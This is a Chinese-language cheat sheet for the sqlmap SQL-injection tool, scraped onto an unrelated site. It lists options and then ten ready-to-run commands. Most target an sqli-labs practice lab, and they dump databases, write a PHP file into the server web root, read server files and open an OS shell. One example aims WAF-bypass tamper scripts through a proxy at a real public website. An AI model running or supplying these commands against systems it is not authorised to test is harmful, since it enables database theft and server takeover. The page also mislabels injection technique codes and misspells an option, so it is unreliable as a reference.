设为首页收藏本站
开启辅助访问

sqlmap参数详解

 您所在的位置:网站首页 红米k30手机通话设置 sqlmap参数详解

sqlmap参数详解

2023-11-20 08:30| 来源: 网络整理| 查看: 265

命令及详解 -h帮助--version版本号-d连接数据库"mysql://root:[email protected]:3306/db"   "数据库种类://账号:密码@地址:端口/库--current-db当前数据库--dbs列出所有数据库 等于show database()--tables列出某库的所有表--columns列出某表的所有列-D选择哪个数据库-T选择哪个表-C选择哪个列--dump 获取字段里的数据--dump-al脱库--batch

选项全选yes

--smart启发式快速判断--formspost请求注入 ,http包头包体每个字段尝试注入, --level最好是2-r

从文件中载入http请求,指定数据包 先抓一个包然后保存下来使用-r

-g从谷歌里按照谷歌语法搜索前100条有get请求的url去测试-o开启性能优化,优化的分别为--keep-alive,--null-connection,--thread--tamper使用脚本,多脚本用逗号隔开 通常绕过waf-v回显等级0~6--delay访问间隔,绕过waf--os-shell获取webshell-m读取文件中的url批量操作--datapost请求的包体可以直接写后面--timeout设置超时时间-level 注入探索等级,一般用4--is-dba

是否是dba权限

--risk 风险等级(0-3,默认为1)--identify-waf检测防火墙类型--param-del设置参数分隔符--skip-urlencode跳过url编码--keep-alive这是持久连接,加快探测速度--null-connection检索没有body响应内容,多用于盲注--thread设置线程数,最大10--technique  选择注入类型 B 布尔注入,E报错注入,U联合注入 T时间盲注 S 使用sqlmap的配置,如果是布尔盲注应选择U而并非B--cookie "t=1"cookie注入--safe-url每隔一段时间去访问安全页面--proxy代理--file-read读取服务器里的哪个文件,等同于手工注入的load_file()--file-write选取本地的哪个文件--file-dest写入服务器里的哪个文件 ,等同于手工注入的into out_file()和--file-write 一起使用--dbms设置数据库类型

只要是单词或者是单词缩写的前面都是--,只要是单字母前面都是-

实例注解:

1、获取所有数据库

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o --dbs --batch  --level=1 --threads=10 --dbms=MySql --technique="U" #-u url #-o 开启性能优化 #--dbs 爆破所有数据库 #--batch 操作默认选择为y #--level=1 注入探索等级为1 #--threads=10 开启10个线程(最大10个) #--dbms=MySql 设置数据库为MySql #--technique="U" 设置注入类型为联合注入

2、获取test库中的表

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o -D test --tables --batch --level=1 --threads=10 --dbms=MySql --technique="U" #-u url #-o 开启性能优化 #-D test 选择test库 #--tables 获取test库里的所有表 #--batch 操作默认选择为y #--level=1 注入探索等级为1 #--threads=10 开启10个线程(最大10个) #--dbms=MySql 设置数据库为MySql #--technique="U" 设置注入类型为联合注入

3、获取make表中的字段

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o -D test -T make --columns --batch --level=1 --threads=10 --dbms=MySql --technique="U" #-u url #-o 开启性能优化 #-D test 选择test库 #-T make 选择make表 #--columns 获取make表里的所有字段 #--batch 操作默认选择为y #--level=1 注入探索等级为1 #--threads=10 开启10个线程(最大10个) #--dbms=MySql 设置数据库为MySql #--technique="U" 设置注入类型为联合注入

4、获取数据

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o -D longmao -T make --dump --batch --level=1 --threads=10 --dbms=MySql --technique="U" #-u url #-o 开启性能优化 #-D test 选择test库 #-T make 选择make表 #--dump 获取make表里的所有数据 #--batch 操作默认选择为y #--level=1 注入探索等级为1 #--threads=10 开启10个线程(最大10个) #--dbms=MySql 设置数据库为MySql #--technique="U" 设置注入类型为联合注入

5、写入文件到服务器

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" --batch --dbms=MySql --file-write="1.php" --file-dest="D:/phpStudy/PHPTutorial/WWW/1.php" #-u url #--batch 操作默认选择为y #--dbms=MySql 设置数据库为MySql #--file-write="1.php" 选择本地文件1.php #--file-dest="D:/phpStudy/PHPTutorial/WWW/1.php" 把本地1.php文件写入到服务器根目录里1.php文件

6、从服务器读入文件

sqlmap -u http://192.168.3.35/sqli-labs-master/Less-1/?id=1 --batch --dbms=MySql --file-read="D:/phpStudy/PHPTutorial/WWW/1.php" #-u url #--batch 操作默认选择为y #--dbms=MySql 设置数据库为MySql #--file-read="1.php" 下载服务器根目录下的1.php文件

7、UA头注入

sqlmap -r "tt" -o --dbs --batch --level=3 --threads=10 --dbms=MySql --technique="E" #-r tt 从tt文件中载入http请求,tt文件中需要把UA头后面加上*号 #-o 开启性能优化 #--dbs 爆破所有数据库 #--batch 操作默认选择为y #--level=3 注入探索等级为3 #--threads=10 开启10个线程(最大10个) #--dbms=MySql 设置数据库为MySql #--technique="E" 设置注入类型为报错注入

8、获取webshell

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" --os-shell #-u url #--os-shell 获取webshell

9、设置代理

sqlmap -u "https://www.baidu.com" -o --dbs --batch --proxy socks5://192.168.3.35:10888 --level=4 --tamper=space2comment --threads=10 --dbms=MySql #-u url #-o 开启性能优化 #--dbs 爆破所有数据库 #--batch 操作默认选择为y #--proxy socks5://192.168.3.35:10888 设置代理 #--level=4 注入探索等级为4 #--tamper=space2comment 使用脚本绕过waf #--threads=10 开启10个线程(最大10个) #--dbms=MySql 设置数据库为MySql

10、Post布尔延迟注入

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-18/" -o --dbs --batch --level=3 --threads=10 --dbms=MySql --forms --technique="UT" #-u url #-o 开启性能优化 #--dbs 爆破所有数据库 #--batch 操作默认选择为y #--level=3 注入探索等级为3 #--threads=10 开启10个线程(最大10个) #--dbms=MySql 设置数据库为MySql #--forms Post注入 #--technique="UT" 设置注入方式为U为布尔注入和T为延迟注入



【本文地址】


今日新闻

推荐新闻

CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3